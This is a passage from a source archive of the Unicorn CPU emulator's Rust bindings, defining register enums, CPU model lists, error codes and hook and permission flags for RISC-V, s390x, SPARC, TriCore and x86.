32, // (assoc) FT0 = 158, // (assoc) FT1 = 159, // (assoc) FT2 = 160, // (assoc) FT3 = 161, // (assoc) FT4 = 162, // (assoc) FT5 = 163, // (assoc) FT6 = 164, // (assoc) FT7 = 165, // (assoc) FS0 = 166, // (assoc) FS1 = 167, // (assoc) FA0 = 168, // (assoc) FA1 = 169, // (assoc) FA2 = 170, // (assoc) FA3 = 171, // (assoc) FA4 = 172, // (assoc) FA5 = 173, // (assoc) FA6 = 174, // (assoc) FA7 = 175, // (assoc) FS2 = 176, // (assoc) FS3 = 177, // (assoc) FS4 = 178, // (assoc) FS5 = 179, // (assoc) FS6 = 180, // (assoc) FS7 = 181, // (assoc) FS8 = 182, // (assoc) FS9 = 183, // (assoc) FS10 = 184, // (assoc) FS11 = 185, // (assoc) FT8 = 186, // (assoc) FT9 = 187, // (assoc) FT10 = 188, // (assoc) FT11 = 189, pub const ZERO: RegisterRISCV = RegisterRISCV::X0; pub const RA: RegisterRISCV = RegisterRISCV::X1; pub const SP: RegisterRISCV = RegisterRISCV::X2; pub const GP: RegisterRISCV = RegisterRISCV::X3; pub const TP: RegisterRISCV = RegisterRISCV::X4; pub const T0: RegisterRISCV = 
RegisterRISCV::X5; pub const T1: RegisterRISCV = RegisterRISCV::X6; pub const T2: RegisterRISCV = RegisterRISCV::X7; pub const S0: RegisterRISCV = RegisterRISCV::X8; pub const FP: RegisterRISCV = RegisterRISCV::X8; pub const S1: RegisterRISCV = RegisterRISCV::X9; pub const A0: RegisterRISCV = RegisterRISCV::X10; pub const A1: RegisterRISCV = RegisterRISCV::X11; pub const A2: RegisterRISCV = RegisterRISCV::X12; pub const A3: RegisterRISCV = RegisterRISCV::X13; pub const A4: RegisterRISCV = RegisterRISCV::X14; pub const A5: RegisterRISCV = RegisterRISCV::X15; pub const A6: RegisterRISCV = RegisterRISCV::X16; pub const A7: RegisterRISCV = RegisterRISCV::X17; pub const S2: RegisterRISCV = RegisterRISCV::X18; pub const S3: RegisterRISCV = RegisterRISCV::X19; pub const S4: RegisterRISCV = RegisterRISCV::X20; pub const S5: RegisterRISCV = RegisterRISCV::X21; pub const S6: RegisterRISCV = RegisterRISCV::X22; pub const S7: RegisterRISCV = RegisterRISCV::X23; pub const S8: RegisterRISCV = RegisterRISCV::X24; pub const S9: RegisterRISCV = RegisterRISCV::X25; pub const S10: RegisterRISCV = RegisterRISCV::X26; pub const S11: RegisterRISCV = RegisterRISCV::X27; pub const T3: RegisterRISCV = RegisterRISCV::X28; pub const T4: RegisterRISCV = RegisterRISCV::X29; pub const T5: RegisterRISCV = RegisterRISCV::X30; pub const T6: RegisterRISCV = RegisterRISCV::X31; pub const FT0: RegisterRISCV = RegisterRISCV::F0; pub const FT1: RegisterRISCV = RegisterRISCV::F1; pub const FT2: RegisterRISCV = RegisterRISCV::F2; pub const FT3: RegisterRISCV = RegisterRISCV::F3; pub const FT4: RegisterRISCV = RegisterRISCV::F4; pub const FT5: RegisterRISCV = RegisterRISCV::F5; pub const FT6: RegisterRISCV = RegisterRISCV::F6; pub const FT7: RegisterRISCV = RegisterRISCV::F7; pub const FS0: RegisterRISCV = RegisterRISCV::F8; pub const FS1: RegisterRISCV = RegisterRISCV::F9; pub const FA0: RegisterRISCV = RegisterRISCV::F10; pub const FA1: RegisterRISCV = RegisterRISCV::F11; pub const FA2: RegisterRISCV = RegisterRISCV::F12; pub const FA3: RegisterRISCV = RegisterRISCV::F13; pub const FA4: RegisterRISCV = RegisterRISCV::F14; pub const FA5: RegisterRISCV = RegisterRISCV::F15; pub const FA6: RegisterRISCV = RegisterRISCV::F16; pub const FA7: RegisterRISCV = RegisterRISCV::F17; pub const FS2: RegisterRISCV = RegisterRISCV::F18; pub const FS3: RegisterRISCV = RegisterRISCV::F19; pub const FS4: RegisterRISCV = RegisterRISCV::F20; pub const FS5: RegisterRISCV = RegisterRISCV::F21; pub const FS6: RegisterRISCV = RegisterRISCV::F22; pub const FS7: RegisterRISCV = RegisterRISCV::F23; pub const FS8: RegisterRISCV = RegisterRISCV::F24; pub const FS9: RegisterRISCV = RegisterRISCV::F25; pub const FS10: RegisterRISCV = RegisterRISCV::F26; pub const FS11: RegisterRISCV = RegisterRISCV::F27; pub const FT8: RegisterRISCV = RegisterRISCV::F28; pub const FT9: RegisterRISCV = RegisterRISCV::F29; pub const FT10: RegisterRISCV = RegisterRISCV::F30; pub const FT11: RegisterRISCV = RegisterRISCV::F31; } impl From<RegisterRISCV> for i32 { fn from(r: RegisterRISCV) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Riscv32CpuModel { UC_CPU_RISCV32_ANY = 0, UC_CPU_RISCV32_BASE32, UC_CPU_RISCV32_SIFIVE_E31, UC_CPU_RISCV32_SIFIVE_U34, } impl From<Riscv32CpuModel> for i32 { fn from(value: Riscv32CpuModel) -> Self { value as i32 } } impl From<&Riscv32CpuModel> for i32 { fn from(value: &Riscv32CpuModel) -> Self { (*value) as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Riscv64CpuModel { 
UC_CPU_RISCV64_ANY = 0, UC_CPU_RISCV64_BASE64, UC_CPU_RISCV64_SIFIVE_E51, UC_CPU_RISCV64_SIFIVE_U54, } impl From<Riscv64CpuModel> for i32 { fn from(value: Riscv64CpuModel) -> Self { value as i32 } } impl From<&Riscv64CpuModel> for i32 { fn from(value: &Riscv64CpuModel) -> Self { (*value) as i32 } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/s390x.rs������������������������������������������������������������0000664�0000000�0000000�00000004625�14675241067�0020030�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // S390X registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterS390X { INVALID = 0, // General purpose registers R0 = 1, R1 = 2, R2 = 3, R3 = 4, R4 = 5, R5 = 6, R6 = 7, R7 = 8, R8 = 9, R9 = 10, R10 = 11, R11 = 12, R12 = 13, R13 = 14, R14 = 15, R15 = 16, // Floating point registers F0 = 17, F1 = 18, F2 = 19, F3 = 20, F4 = 21, F5 = 22, F6 = 23, F7 = 24, F8 = 25, F9 = 26, F10 = 27, F11 = 28, F12 = 29, F13 = 30, F14 = 31, F15 = 32, F16 = 33, F17 = 34, F18 = 35, F19 = 36, F20 = 37, F21 = 38, F22 = 39, F23 = 40, F24 = 41, F25 = 42, F26 = 43, F27 = 44, F28 = 45, F29 = 46, F30 = 47, F31 = 48, // Access registers A0 = 49, A1 = 50, A2 = 51, A3 = 52, A4 = 53, A5 = 54, A6 = 55, A7 = 56, A8 = 57, A9 = 58, A10 = 59, A11 = 60, A12 = 61, A13 = 62, A14 = 63, A15 = 64, PC = 65, PSWM = 66, ENDING = 67, } impl From<RegisterS390X> for i32 { fn from(r: RegisterS390X) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum S390xCpuModel { UC_CPU_S390X_Z900 = 0, UC_CPU_S390X_Z900_2, UC_CPU_S390X_Z900_3, UC_CPU_S390X_Z800, UC_CPU_S390X_Z990, UC_CPU_S390X_Z990_2, UC_CPU_S390X_Z990_3, UC_CPU_S390X_Z890, UC_CPU_S390X_Z990_4, UC_CPU_S390X_Z890_2, UC_CPU_S390X_Z990_5, UC_CPU_S390X_Z890_3, UC_CPU_S390X_Z9EC, UC_CPU_S390X_Z9EC_2, UC_CPU_S390X_Z9BC, UC_CPU_S390X_Z9EC_3, UC_CPU_S390X_Z9BC_2, UC_CPU_S390X_Z10EC, UC_CPU_S390X_Z10EC_2, UC_CPU_S390X_Z10BC, UC_CPU_S390X_Z10EC_3, UC_CPU_S390X_Z10BC_2, UC_CPU_S390X_Z196, UC_CPU_S390X_Z196_2, UC_CPU_S390X_Z114, UC_CPU_S390X_ZEC12, UC_CPU_S390X_ZEC12_2, UC_CPU_S390X_ZBC12, UC_CPU_S390X_Z13, UC_CPU_S390X_Z13_2, UC_CPU_S390X_Z13S, UC_CPU_S390X_Z14, UC_CPU_S390X_Z14_2, UC_CPU_S390X_Z14ZR1, UC_CPU_S390X_GEN15A, UC_CPU_S390X_GEN15B, UC_CPU_S390X_QEMU, } impl From<S390xCpuModel> for i32 { fn from(value: S390xCpuModel) -> Self { value as i32 } } impl From<&S390xCpuModel> for i32 { fn from(value: &S390xCpuModel) -> Self { (*value) as i32 } } 
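// Illustrative sketch (added; not part of the generated bindings): the `From`
// impls above are what let a CPU model be handed to APIs that take a raw i32,
// e.g. `Unicorn::ctl_set_cpu_model`. A small self-check of the conversions:
#[cfg(test)]
mod s390x_cpu_model_sketch {
    use super::*;

    #[test]
    fn cpu_model_converts_to_raw_i32() {
        // Z900 carries an explicit discriminant of 0; Z800 is the fourth
        // variant, so its implicit discriminant is 3.
        assert_eq!(i32::from(&S390xCpuModel::UC_CPU_S390X_Z900), 0);
        assert_eq!(i32::from(S390xCpuModel::UC_CPU_S390X_Z800), 3);
    }
}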
�����������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/sparc.rs������������������������������������������������������������0000664�0000000�0000000�00000006535�14675241067�0020254�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // SPARC registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum RegisterSPARC { INVALID = 0, F0 = 1, F1 = 2, F2 = 3, F3 = 4, F4 = 5, F5 = 6, F6 = 7, F7 = 8, F8 = 9, F9 = 10, F10 = 11, F11 = 12, F12 = 13, F13 = 14, F14 = 15, F15 = 16, F16 = 17, F17 = 18, F18 = 19, F19 = 20, F20 = 21, F21 = 22, F22 = 23, F23 = 24, F24 = 25, F25 = 26, F26 = 27, F27 = 28, F28 = 29, F29 = 30, F30 = 31, F31 = 32, F32 = 33, F34 = 34, F36 = 35, F38 = 36, F40 = 37, F42 = 38, F44 = 39, F46 = 40, F48 = 41, F50 = 42, F52 = 43, F54 = 44, F56 = 45, F58 = 46, F60 = 47, F62 = 48, FCC0 = 49, FCC1 = 50, FCC2 = 51, FCC3 = 52, G0 = 53, G1 = 54, G2 = 55, G3 = 56, G4 = 57, G5 = 58, G6 = 59, G7 = 60, I0 = 61, I1 = 62, I2 = 63, I3 = 64, I4 = 65, I5 = 66, FP = 67, I7 = 68, ICC = 69, L0 = 70, L1 = 71, L2 = 72, L3 = 73, L4 = 74, L5 = 75, L6 = 76, L7 = 77, O0 = 78, O1 = 79, O2 = 80, O3 = 81, O4 = 82, O5 = 83, SP = 84, O7 = 85, Y = 86, XCC = 87, PC = 88, ENDING = 89, } impl RegisterSPARC { // alias registers // (assoc) O6 = 84, // (assoc) I6 = 67, pub const O6: RegisterSPARC = RegisterSPARC::SP; pub const I6: RegisterSPARC = RegisterSPARC::FP; } impl From<RegisterSPARC> for i32 { fn from(r: RegisterSPARC) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Sparc32CpuModel { UC_CPU_SPARC32_FUJITSU_MB86904 = 0, UC_CPU_SPARC32_FUJITSU_MB86907, UC_CPU_SPARC32_TI_MICROSPARC_I, UC_CPU_SPARC32_TI_MICROSPARC_II, UC_CPU_SPARC32_TI_MICROSPARC_IIEP, UC_CPU_SPARC32_TI_SUPERSPARC_40, UC_CPU_SPARC32_TI_SUPERSPARC_50, UC_CPU_SPARC32_TI_SUPERSPARC_51, UC_CPU_SPARC32_TI_SUPERSPARC_60, UC_CPU_SPARC32_TI_SUPERSPARC_61, UC_CPU_SPARC32_TI_SUPERSPARC_II, UC_CPU_SPARC32_LEON2, UC_CPU_SPARC32_LEON3, } impl From<Sparc32CpuModel> for i32 { fn from(value: Sparc32CpuModel) -> Self { value as i32 } } impl From<&Sparc32CpuModel> for i32 { fn from(value: &Sparc32CpuModel) -> Self { (*value) as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Sparc64CpuModel { UC_CPU_SPARC64_FUJITSU = 0, UC_CPU_SPARC64_FUJITSU_III, UC_CPU_SPARC64_FUJITSU_IV, UC_CPU_SPARC64_FUJITSU_V, UC_CPU_SPARC64_TI_ULTRASPARC_I, UC_CPU_SPARC64_TI_ULTRASPARC_II, UC_CPU_SPARC64_TI_ULTRASPARC_III, UC_CPU_SPARC64_TI_ULTRASPARC_IIE, UC_CPU_SPARC64_SUN_ULTRASPARC_III, UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU, UC_CPU_SPARC64_SUN_ULTRASPARC_IIII, UC_CPU_SPARC64_SUN_ULTRASPARC_IV, UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS, UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS, UC_CPU_SPARC64_SUN_ULTRASPARC_T1, UC_CPU_SPARC64_SUN_ULTRASPARC_T2, UC_CPU_SPARC64_NEC_ULTRASPARC_I, } impl From<Sparc64CpuModel> for i32 { fn from(value: Sparc64CpuModel) -> Self { value as i32 } } impl From<&Sparc64CpuModel> for i32 { fn from(value: &Sparc64CpuModel) -> Self { (*value) as i32 } } 
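// Illustrative sketch (added; not part of the generated bindings): the
// associated constants above alias the ABI names O6/I6 onto SP/FP, so either
// spelling selects the same register id when passed to `reg_read`/`reg_write`.
#[cfg(test)]
mod sparc_alias_sketch {
    use super::*;

    #[test]
    fn abi_aliases_match_canonical_registers() {
        assert_eq!(RegisterSPARC::O6, RegisterSPARC::SP);
        assert_eq!(RegisterSPARC::I6, RegisterSPARC::FP);
        // SP is declared with discriminant 84 above.
        assert_eq!(i32::from(RegisterSPARC::SP), 84);
    }
}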
�������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/tricore.rs����������������������������������������������������������0000664�0000000�0000000�00000005632�14675241067�0020610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // TRICORE registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterTRICORE { INVALID = 0, A0 = 1, A1 = 2, A2 = 3, A3 = 4, A4 = 5, A5 = 6, A6 = 7, A7 = 8, A8 = 9, A9 = 10, A10 = 11, A11 = 12, A12 = 13, A13 = 14, A14 = 15, A15 = 16, D0 = 17, D1 = 18, D2 = 19, D3 = 20, D4 = 21, D5 = 22, D6 = 23, D7 = 24, D8 = 25, D9 = 26, D10 = 27, D11 = 28, D12 = 29, D13 = 30, D14 = 31, D15 = 32, PCXI = 33, PSW = 34, PSW_USB_C = 35, PSW_USB_V = 36, PSW_USB_SV = 37, PSW_USB_AV = 38, PSW_USB_SAV = 39, PC = 40, SYSCON = 41, CPU_ID = 42, BIV = 43, BTV = 44, ISP = 45, ICR = 46, FCX = 47, LCX = 48, COMPAT = 49, DPR0_U = 50, DPR1_U = 51, DPR2_U = 52, DPR3_U = 53, DPR0_L = 54, DPR1_L = 55, DPR2_L = 56, DPR3_L = 57, CPR0_U = 58, CPR1_U = 59, CPR2_U = 60, CPR3_U = 61, CPR0_L = 62, CPR1_L = 63, CPR2_L = 64, CPR3_L = 65, DPM0 = 66, DPM1 = 67, DPM2 = 68, DPM3 = 69, CPM0 = 70, CPM1 = 71, CPM2 = 72, CPM3 = 73, MMU_CON = 74, MMU_ASI = 75, MMU_TVA = 76, MMU_TPA = 77, MMU_TPX = 78, MMU_TFA = 79, BMACON = 80, SMACON = 81, DIEAR = 82, DIETR = 83, CCDIER = 84, MIECON = 85, PIEAR = 86, PIETR = 87, CCPIER = 88, DBGSR = 89, EXEVT = 90, CREVT = 91, SWEVT = 92, TR0EVT = 93, TR1EVT = 94, DMS = 95, DCX = 96, DBGTCR = 97, CCTRL = 98, CCNT = 99, ICNT = 100, M1CNT = 101, M2CNT = 102, M3CNT = 103, ENDING = 104, } impl RegisterTRICORE { // alias registers // (assoc) GA0 = 1, // (assoc) GA1 = 2, // (assoc) GA8 = 9, // (assoc) GA9 = 10, // (assoc) SP = 11, // (assoc) LR = 12, // (assoc) IA = 16, // (assoc) ID = 32, pub const GA0: RegisterTRICORE = RegisterTRICORE::A0; pub const GA1: RegisterTRICORE = RegisterTRICORE::A1; pub const GA8: RegisterTRICORE = RegisterTRICORE::A8; pub const GA9: RegisterTRICORE = RegisterTRICORE::A9; pub const SP: RegisterTRICORE = RegisterTRICORE::A10; pub const LR: RegisterTRICORE = RegisterTRICORE::A11; pub const IA: RegisterTRICORE = RegisterTRICORE::A15; pub const ID: RegisterTRICORE = RegisterTRICORE::D15; } impl From<RegisterTRICORE> for i32 { fn from(r: RegisterTRICORE) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum TricoreCpuModel { UC_CPU_TRICORE_TC1796, UC_CPU_TRICORE_TC1797, UC_CPU_TRICORE_TC27X, } impl From<TricoreCpuModel> for i32 { fn from(value: TricoreCpuModel) -> Self { value as i32 } } impl From<&TricoreCpuModel> for i32 { fn from(value: &TricoreCpuModel) -> Self { (*value) as i32 } } 
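// Illustrative sketch (added; not part of the generated bindings): TriCore's
// calling-convention names (SP, LR, ...) resolve to the underlying A/D
// registers, and the CPU models enumerate from 0 in declaration order.
#[cfg(test)]
mod tricore_alias_sketch {
    use super::*;

    #[test]
    fn aliases_and_models_resolve() {
        assert_eq!(RegisterTRICORE::SP, RegisterTRICORE::A10);
        assert_eq!(RegisterTRICORE::LR, RegisterTRICORE::A11);
        // TC27X is the third variant of `TricoreCpuModel`.
        assert_eq!(i32::from(TricoreCpuModel::UC_CPU_TRICORE_TC27X), 2);
    }
}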
������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/unicorn_const.rs����������������������������������������������������0000664�0000000�0000000�00000017163�14675241067�0022026�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] use bitflags::bitflags; pub const API_MAJOR: u64 = 2; pub const API_MINOR: u64 = 0; pub const VERSION_MAJOR: u64 = 2; pub const VERSION_MINOR: u64 = 0; pub const VERSION_PATCH: u64 = 0; pub const VERSION_EXTRA: u64 = 7; pub const SECOND_SCALE: u64 = 1_000_000; pub const MILISECOND_SCALE: u64 = 1_000; #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum uc_error { OK = 0, NOMEM = 1, ARCH = 2, HANDLE = 3, MODE = 4, VERSION = 5, READ_UNMAPPED = 6, WRITE_UNMAPPED = 7, FETCH_UNMAPPED = 8, HOOK = 9, INSN_INVALID = 10, MAP = 11, WRITE_PROT = 12, READ_PROT = 13, FETCH_PROT = 14, ARG = 15, READ_UNALIGNED = 16, WRITE_UNALIGNED = 17, FETCH_UNALIGNED = 18, HOOK_EXIST = 19, RESOURCE = 20, EXCEPTION = 21, } impl uc_error { /// Calls op if the result is Ok, otherwise returns the Err value of self. /// This function can be used for control flow based on Result values. pub fn and_then<U, F: FnOnce() -> Result<U, uc_error>>(self, op: F) -> Result<U, uc_error> { if let Self::OK = self { op() } else { Err(self) } } /// Returns res if the result is Ok, otherwise returns the Err value of self. /// Arguments passed to and are eagerly evaluated; if you are passing the result /// of a function call, it is recommended to use and_then, which is lazily evaluated. pub fn and<U>(self, res: Result<U, uc_error>) -> Result<U, uc_error> { if let Self::OK = self { res } else { Err(self) } } } impl From<uc_error> for Result<(), uc_error> { fn from(value: uc_error) -> Self { if let uc_error::OK = value { Ok(()) } else { Err(value) } } } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum MemType { READ = 16, WRITE = 17, FETCH = 18, READ_UNMAPPED = 19, WRITE_UNMAPPED = 20, FETCH_UNMAPPED = 21, WRITE_PROT = 22, READ_PROT = 23, FETCH_PROT = 24, READ_AFTER = 25, } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum TlbType { CPU = 0, VIRTUAL = 1, } bitflags! 
{ #[repr(C)] #[derive(Copy, Clone)] pub struct HookType: i32 { const INTR = 1; const INSN = 2; const CODE = 4; const BLOCK = 8; const MEM_READ_UNMAPPED = 0x10; const MEM_WRITE_UNMAPPED = 0x20; const MEM_FETCH_UNMAPPED = 0x40; const MEM_UNMAPPED = Self::MEM_READ_UNMAPPED.bits() | Self::MEM_WRITE_UNMAPPED.bits() | Self::MEM_FETCH_UNMAPPED.bits(); const MEM_READ_PROT = 0x80; const MEM_WRITE_PROT = 0x100; const MEM_FETCH_PROT = 0x200; const MEM_PROT = Self::MEM_READ_PROT.bits() | Self::MEM_WRITE_PROT.bits() | Self::MEM_FETCH_PROT.bits(); const MEM_READ = 0x400; const MEM_WRITE = 0x800; const MEM_FETCH = 0x1000; const MEM_VALID = Self::MEM_READ.bits() | Self::MEM_WRITE.bits() | Self::MEM_FETCH.bits(); const MEM_READ_AFTER = 0x2000; const INSN_INVALID = 0x4000; const MEM_READ_INVALID = Self::MEM_READ_UNMAPPED.bits() | Self::MEM_READ_PROT.bits(); const MEM_WRITE_INVALID = Self::MEM_WRITE_UNMAPPED.bits() | Self::MEM_WRITE_PROT.bits(); const MEM_FETCH_INVALID = Self::MEM_FETCH_UNMAPPED.bits() | Self::MEM_FETCH_PROT.bits(); const MEM_INVALID = Self::MEM_READ_INVALID.bits() | Self::MEM_WRITE_INVALID.bits() | Self::MEM_FETCH_INVALID.bits(); const MEM_ALL = Self::MEM_VALID.bits() | Self::MEM_INVALID.bits(); const TLB = (1 << 17); } } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum Query { MODE = 1, PAGE_SIZE = 2, ARCH = 3, TIMEOUT = 4, } bitflags! { #[repr(C)] #[derive(Copy, Clone, Debug)] pub struct Permission : u32 { const NONE = 0; const READ = 1; const WRITE = 2; const EXEC = 4; const ALL = Self::READ.bits() | Self::WRITE.bits() | Self::EXEC.bits(); } } #[repr(C)] #[derive(Debug, Clone)] pub struct MemRegion { pub begin: u64, pub end: u64, pub perms: Permission, } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum Arch { ARM = 1, ARM64 = 2, MIPS = 3, X86 = 4, PPC = 5, SPARC = 6, M68K = 7, RISCV = 8, S390X = 9, TRICORE = 10, MAX = 11, } impl TryFrom<usize> for Arch { type Error = uc_error; fn try_from(v: usize) -> Result<Self, Self::Error> { match v { x if x == Self::ARM as usize => Ok(Self::ARM), x if x == Self::ARM64 as usize => Ok(Self::ARM64), x if x == Self::MIPS as usize => Ok(Self::MIPS), x if x == Self::X86 as usize => Ok(Self::X86), x if x == Self::PPC as usize => Ok(Self::PPC), x if x == Self::SPARC as usize => Ok(Self::SPARC), x if x == Self::M68K as usize => Ok(Self::M68K), x if x == Self::RISCV as usize => Ok(Self::RISCV), x if x == Self::S390X as usize => Ok(Self::S390X), x if x == Self::TRICORE as usize => Ok(Self::TRICORE), x if x == Self::MAX as usize => Ok(Self::MAX), _ => Err(uc_error::ARCH), } } } bitflags! { #[derive(Copy, Clone)] #[repr(C)] pub struct Mode: i32 { const LITTLE_ENDIAN = 0; const BIG_ENDIAN = 0x4000_0000; const ARM = 0; const THUMB = 0x10; const MCLASS = 0x20; const V8 = 0x40; const ARMBE8 = 0x400; const ARM926 = 0x80; const ARM946 = 0x100; const ARM1176 = 0x200; const MICRO = Self::THUMB.bits(); const MIPS3 = Self::MCLASS.bits(); const MIPS32R6 = Self::V8.bits(); const MIPS32 = 4; const MIPS64 = 8; const MODE_16 = 2; const MODE_32 = Self::MIPS32.bits(); const MODE_64 = Self::MIPS64.bits(); const PPC32 = Self::MIPS32.bits(); const PPC64 = Self::MIPS64.bits(); const QPX = Self::THUMB.bits(); const SPARC32 = Self::MIPS32.bits(); const SPARC64 = Self::MIPS64.bits(); const V9 = Self::THUMB.bits(); const RISCV32 = Self::MIPS32.bits(); const RISCV64 = Self::MIPS64.bits(); } } // Represent a TranslationBlock. #[repr(C)] pub struct TranslationBlock { pub pc: u64, pub icount: u16, pub size: u16, } macro_rules! 
macro_rules! UC_CTL_READ {
    ($expr:expr) => {
        $expr as u32 | ControlType::UC_CTL_IO_READ as u32
    };
}

macro_rules! UC_CTL_WRITE {
    ($expr:expr) => {
        $expr as u32 | ControlType::UC_CTL_IO_WRITE as u32
    };
}

macro_rules! UC_CTL_READ_WRITE {
    ($expr:expr) => {
        $expr as u32 | ControlType::UC_CTL_IO_WRITE as u32 | ControlType::UC_CTL_IO_READ as u32
    };
}

#[allow(clippy::upper_case_acronyms)]
#[repr(u64)]
pub enum ControlType {
    UC_CTL_UC_MODE = 0,
    UC_CTL_UC_PAGE_SIZE = 1,
    UC_CTL_UC_ARCH = 2,
    UC_CTL_UC_TIMEOUT = 3,
    UC_CTL_UC_USE_EXITS = 4,
    UC_CTL_UC_EXITS_CNT = 5,
    UC_CTL_UC_EXITS = 6,
    UC_CTL_CPU_MODEL = 7,
    UC_CTL_TB_REQUEST_CACHE = 8,
    UC_CTL_TB_REMOVE_CACHE = 9,
    UC_CTL_TB_FLUSH = 10,
    UC_CTL_TLB_FLUSH = 11,
    UC_CTL_TLB_TYPE = 12,
    UC_CTL_TCG_BUFFER_SIZE = 13,
    UC_CTL_CONTEXT_MODE = 14,
    UC_CTL_IO_READ = 1 << 31,
    UC_CTL_IO_WRITE = 1 << 30,
}

bitflags! {
    #[derive(Debug, Copy, Clone)]
    #[repr(C)]
    pub struct ContextMode: u32 {
        const CPU = 1;
        const Memory = 2;
    }
}

#[repr(C)]
#[derive(Debug, Clone, Copy)]
pub struct TlbEntry {
    pub paddr: u64,
    pub perms: Permission,
}

unicorn-2.1.1/bindings/rust/src/x86.rs

#![allow(non_camel_case_types)]

// X86 registers
#[repr(C)]
#[derive(PartialEq, Debug, Clone, Copy)]
#[allow(clippy::upper_case_acronyms)]
pub enum RegisterX86 {
    INVALID = 0, AH = 1, AL = 2, AX = 3, BH = 4, BL = 5,
    BP = 6, BPL = 7, BX = 8, CH = 9, CL = 10, CS = 11,
    CX = 12, DH = 13, DI = 14, DIL = 15, DL = 16, DS = 17,
    DX = 18, EAX = 19, EBP = 20, EBX = 21, ECX = 22, EDI = 23,
    EDX = 24, EFLAGS = 25, EIP = 26, ES = 28, ESI = 29, ESP = 30,
    FPSW = 31, FS = 32, GS = 33, IP = 34, RAX = 35, RBP = 36,
    RBX = 37, RCX = 38, RDI = 39, RDX = 40, RIP = 41, RSI = 43,
    RSP = 44, SI = 45, SIL = 46, SP = 47, SPL = 48, SS = 49,
    CR0 = 50, CR1 = 51, CR2 = 52, CR3 = 53, CR4 = 54, CR8 = 58,
    DR0 = 66, DR1 = 67, DR2 = 68, DR3 = 69, DR4 = 70, DR5 = 71, DR6 = 72, DR7 = 73,
    FP0 = 82, FP1 = 83, FP2 = 84, FP3 = 85, FP4 = 86, FP5 = 87, FP6 = 88, FP7 = 89,
    K0 = 90, K1 = 91, K2 = 92, K3 = 93, K4 = 94, K5 = 95, K6 = 96, K7 = 97,
    MM0 = 98, MM1 = 99, MM2 = 100, MM3 = 101, MM4 = 102, MM5 = 103, MM6 = 104, MM7 = 105,
    R8 = 106, R9 = 107, R10 = 108, R11 = 109, R12 = 110, R13 = 111, R14 = 112, R15 = 113,
    ST0 = 114, ST1 = 115, ST2 = 116, ST3 = 117, ST4 = 118, ST5 = 119, ST6 = 120, ST7 = 121,
    XMM0 = 122, XMM1 = 123, XMM2 = 124, XMM3 = 125, XMM4 = 126, XMM5 = 127, XMM6 = 128, XMM7 = 129,
    XMM8 = 130, XMM9 = 131, XMM10 = 132, XMM11 = 133, XMM12 = 134, XMM13 = 135, XMM14 = 136, XMM15 = 137,
    XMM16 = 138, XMM17 = 139, XMM18 = 140, XMM19 = 141, XMM20 = 142, XMM21 = 143, XMM22 = 144, XMM23 = 145,
    XMM24 = 146, XMM25 = 147, XMM26 = 148, XMM27 = 149, XMM28 = 150, XMM29 = 151, XMM30 = 152, XMM31 = 153,
    YMM0 = 154, YMM1 = 155, YMM2 = 156, YMM3 = 157, YMM4 = 158, YMM5 = 159, YMM6 = 160, YMM7 = 161,
    YMM8 = 162, YMM9 = 163, YMM10 = 164, YMM11 = 165, YMM12 = 166, YMM13 = 167, YMM14 = 168, YMM15 = 169,
    YMM16 = 170, YMM17 = 171, YMM18 = 172, YMM19 = 173, YMM20 = 174, YMM21 = 175, YMM22 = 176, YMM23 = 177,
    YMM24 = 178, YMM25 = 179, YMM26 = 180, YMM27 = 181, YMM28 = 182, YMM29 = 183, YMM30 = 184, YMM31 = 185,
    ZMM0 = 186, ZMM1 = 187, ZMM2 = 188, ZMM3 = 189, ZMM4 = 190, ZMM5 = 191, ZMM6 = 192, ZMM7 = 193,
    ZMM8 = 194, ZMM9 = 195, ZMM10 = 196, ZMM11 = 197, ZMM12 = 198, ZMM13 = 199, ZMM14 = 200, ZMM15 = 201,
    ZMM16 = 202, ZMM17 = 203, ZMM18 = 204, ZMM19 = 205, ZMM20 = 206, ZMM21 = 207, ZMM22 = 208, ZMM23 = 209,
    ZMM24 = 210, ZMM25 = 211, ZMM26 = 212, ZMM27 = 213, ZMM28 = 214, ZMM29 = 215, ZMM30 = 216, ZMM31 = 217,
    R8B = 218, R9B = 219, R10B = 220, R11B = 221, R12B = 222, R13B = 223, R14B = 224, R15B = 225,
